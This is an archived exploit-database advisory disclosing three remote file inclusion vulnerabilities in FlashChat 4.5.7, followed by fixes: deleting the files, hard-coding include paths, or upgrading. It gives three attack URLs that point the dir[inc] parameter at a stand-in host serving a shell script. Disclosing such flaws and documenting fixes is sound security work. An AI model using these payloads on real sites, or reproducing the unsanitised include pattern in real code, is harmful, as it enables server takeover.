FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion

Author: NeXtMaN
type: webapps
platform: php
port: 
date_added: 2006-09-03 
date_updated:  
verified: 1 
codes: OSVDB-28435;CVE-2006-4583;OSVDB-28434;OSVDB-28433 
tags: 
aliases:  
screenshot_url:  
application_url: 

NeXtMaN <mc.nadz [at] gmail.com>

Here are 3 RFI vulnerabilities in Flashchat i've found:

Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?

video here:

Code:
http://rapidshare.de/files/31362430/Flashchat.rar.html


EDIT: Solution:


It looks like the vulnerable files are there in case you want to integrate with another script. The script that would require these files is AEDating:

you simply delete the following files and you will be secure:

/inc/cmses/aedating4CMS.php
/inc/cmses/aedatingCMS.php
/inc/cmses/aedatingCMS2.php

if your flashchat is integrated with AEDating and/or you dont want to delete the files you can just edit the 3 files to use your path like this:

Replace this:

$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]admin.inc.php" );

With this:

$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "[Your AED path]/db.inc.php" );
require_once( "[Your AED path]/admin.inc.php" );

Alternatively you could just upgrade to 4.6.2 (just released)

PS, all 3 of those files are vulnerable and will need editing.

# milw0rm.com [2006-09-04]